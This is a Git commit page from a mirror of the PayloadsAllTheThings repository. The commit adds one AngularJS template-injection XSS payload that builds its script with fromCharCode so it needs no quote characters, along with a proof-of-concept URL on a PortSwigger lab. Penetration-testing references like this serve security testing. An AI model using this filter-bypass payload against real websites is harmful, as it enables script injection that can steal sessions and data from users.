Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-12 14:22:47 +00:00
Code Issues Projects Releases Packages Wiki Activity

[Update] Added 1 payload

Browse source 
Added one payload which executes without any usage of single or double quotes. Helpful when you have AngularJS injection but quotes are blocked by application.
Working proof of payload here: 

https://portswigger-labs.net/xss/angularjs.php?type=reflected&csp=0&version=1.6.0&x={{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}}
This commit is contained in:
Viren Pawar 2020-08-15 16:29:13 +05:30 committed by GitHub
parent d1104d6ce1
commit 0266a7dd67
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
XSS Injection/XSS in Angular.md
View file

@ -149,6 +149,14 @@ AngularJS 1.0.1 - 1.1.5 and Vue JS
{{constructor.constructor('alert(1)')()}}
```
### Advanced bypassing XSS
AngularJS (without `'` single and `"` double quotes) by [@Viren](https://twitter.com/VirenPawar_)
```javascript
{{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}}
```
### Blind XSS